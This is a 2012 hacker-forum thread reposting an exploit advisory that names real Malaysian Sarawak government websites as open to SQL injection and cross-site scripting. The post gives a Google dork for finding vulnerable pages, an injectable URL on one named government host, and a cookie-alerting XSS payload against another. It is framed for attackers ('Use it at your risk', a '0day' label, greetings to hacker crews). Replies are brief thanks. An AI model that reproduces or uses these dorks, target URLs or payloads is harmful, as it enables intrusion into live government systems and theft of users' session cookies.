.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 Ministry Malaysia XSS and SQL Injection Vulnerability

Go down 
3 posters
PengirimMessage
alexis
VIP Member
VIP Member
alexis


Jumlah posting : 199
Points : 384
Reputation : 9
Join date : 21.02.11

Ministry Malaysia XSS and SQL Injection Vulnerability Empty
PostSubyek: Ministry Malaysia XSS and SQL Injection Vulnerability   Ministry Malaysia XSS and SQL Injection Vulnerability Icon_minitimeMon Jun 18, 2012 11:37 pm

- Use it at your risk,,,
- Made In Indonesia

---------------------------------------------------------------------------!

# Exploit Title: Ministry Malaysia XSS and SQL Injection Vulnerability
# Date: June 15 . 2012
# Author: phiA

---------------------------------------------------------------------------!

#E-mail : phia0343s@hackermail.com
# Category: [webapps] 0day
#Vendor : Ministry Malaysia [owner site]

---------------------------------------------------------------------------!
# Google dork: inurl:/modules/web/page_print.php?id=

#Security risk : Critical
# Tested on: BackTrack 5

---------------------------------------------------------------------------!


#1 Proof OF Concept SQL Injection Vulnerability


a sample from google dork !

http://www.kktpk.sarawak.gov.my/modules/web/page_print.php?id=[sqli]


#2 Proof Of Concept of XSS Vulnerability

a sample from google dork !

http://www.midcom.sarawak.gov.my/modules/web/page.php?id='"<script>alert(document.cookie)</script>


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Thankz to : Indonesian Grey Hat Team, Jakarta Anonymous Club , BlackNewbie Team , Depe , Arai Maulana , n0Xtra , Vicky_cyber , RadityaHN , X-Cisadane , Sany Morphic , all Indonesian Hackers.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Quote:

-Indonesian people here !

-You should have eXpect us !
Kembali Ke Atas Go down
sayen
NuuBiiTooL
NuuBiiTooL



Jumlah posting : 12
Points : 12
Reputation : 0
Join date : 11.04.12
Age : 32
Lokasi : Mojokerto

Ministry Malaysia XSS and SQL Injection Vulnerability Empty
PostSubyek: Re: Ministry Malaysia XSS and SQL Injection Vulnerability   Ministry Malaysia XSS and SQL Injection Vulnerability Icon_minitimeWed Jun 27, 2012 1:34 am

agak gak jelas nih
I Newbie Ministry Malaysia XSS and SQL Injection Vulnerability 3529815765
Kembali Ke Atas Go down
http://sayenvirus.blogspot.com
black.bottle
Top Nubie
Top Nubie
black.bottle


Jumlah posting : 34
Points : 38
Reputation : 0
Join date : 03.07.12
Age : 38

Ministry Malaysia XSS and SQL Injection Vulnerability Empty
PostSubyek: Re: Ministry Malaysia XSS and SQL Injection Vulnerability   Ministry Malaysia XSS and SQL Injection Vulnerability Icon_minitimeTue Jul 03, 2012 9:15 am

thanks 4 share
Kembali Ke Atas Go down
Sponsored content





Ministry Malaysia XSS and SQL Injection Vulnerability Empty
PostSubyek: Re: Ministry Malaysia XSS and SQL Injection Vulnerability   Ministry Malaysia XSS and SQL Injection Vulnerability Icon_minitime

Kembali Ke Atas Go down
 
Ministry Malaysia XSS and SQL Injection Vulnerability
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» XLAgenda : SQL injection vulnerability
» eNdonesia 8.3 SQL Injection Vulnerability
» Webit Cms SQL Injection Vulnerability
» WEBANDHOST CMS SQL Injection Vulnerability
» PhotoPost PHP SQL Injection Vulnerability

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Exploits-
Navigasi: